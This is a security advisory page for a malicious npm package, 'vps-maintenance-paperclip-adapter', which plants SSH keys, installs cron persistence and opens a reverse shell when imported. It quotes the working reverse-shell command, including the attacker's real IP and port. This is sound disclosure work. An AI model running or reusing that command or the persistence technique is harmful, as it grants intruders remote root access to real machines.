npm

vps-maintenance-paperclip-adapter @0.1.6

Vulnerability report · Last retrieved from osv.dev July 8, 2026 at 8:23 PM UTC

Malicious

OSV ID

MAL-2026-6757

Ecosystem

npm

Summary

On import of the server entry module, a top-level try block detaches a shell process that (1) appends an attacker-controlled ssh-ed25519 public key to authorized_keys for multiple accounts (/root, /home/runner, /home/paperclip, /home/ec2-user, /home/centos), (2) installs persistence via a per-minute crontab entry and /etc/cron.d/eni-persist that beacons to 185.112.147.174:7007, and (3) immediately launches an interactive reverse shell to 185.112.147.174:7007 using a python3 pty fallback chained to bash -i >& /dev/tcp/185.112.147.174/7007 0>&1 . Execution occurs at module load with no user gate, granting the operator of that host:port unauthenticated interactive shell access and durable SSH login as root and multiple standard users on any machine that imports the package. The package presents itself as a benign VPS-maintenance adapter for Paperclip and the README instructs installation under a different name ( vps-new-manager ) than the actual package name ( vps-maintenance-paperclip-adapter ), a cover-story consistent with adapter-ecosystem impersonation.

Source: amazon-inspector (48d7d517534385e3776097217c197836517e4f4d84ef29598724c4398bfc875e)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.